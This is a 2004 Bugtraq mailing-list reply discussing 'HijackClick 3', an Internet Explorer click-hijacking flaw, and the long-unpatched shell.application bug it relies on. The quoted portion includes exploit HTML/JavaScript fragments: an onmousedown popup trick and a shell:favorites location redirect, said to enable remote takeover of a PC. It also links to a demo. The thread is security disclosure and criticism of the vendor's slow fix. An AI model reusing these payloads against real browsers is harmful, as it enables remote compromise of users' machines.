> -----Original Message----- > From: http-equiv@xxxxxxxxxx [mailto:1@xxxxxxxxxxx] > Sent: Monday, July 12, 2004 12:06 PM > To: bugtraq@xxxxxxxxxxxxxxxxx > Cc: NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx > Subject: Re: HijackClick 3 > <snip> > This is absolutely fantastic Paul, with a patented double-click > of the mouse we can remotely take over the target's computer: > > Just substitute as follows: > > 1. <img src="greyhat.html" id=anch > onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height= > 2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert > ()',3000);" style="width=168px;height=152px;background-image:url > ('youlickit.gif');cursor:hand" title="click me!"></a> > > 2. location="shell:favorites\\greyhat[1].htm" > > Someone was querying the other day whether shell in Internet > Explorer poses a problem [despite repeated demonstrations]. > Pah ! Probably not. > > Quick and Dirty Working Demo: > > http://www.malware.com/paul.html Just to add... this, too, works on using shell.application, a bug which has been open for around ten months. In fact, I don't think there has been a bug in about ten months (coincidentally) that does not rely on either Jelmer's adodb bug or your shell.application bug. Microsoft can remove the threat from all users right now, today, and issue a fix. We won't see criminals using these things to grab people's money tommorrow. We won't see hundreds of articles critical of their browser. We won't see devious, targetted attacks on bank employees or anyone else. Remove the escalating security holes, and you remove the ones that depend on it. They then might only serve some use for phishers and the like, people who are only minorly more successful using such exploits over using straight cons. > -- > http://www.malware.com > > > >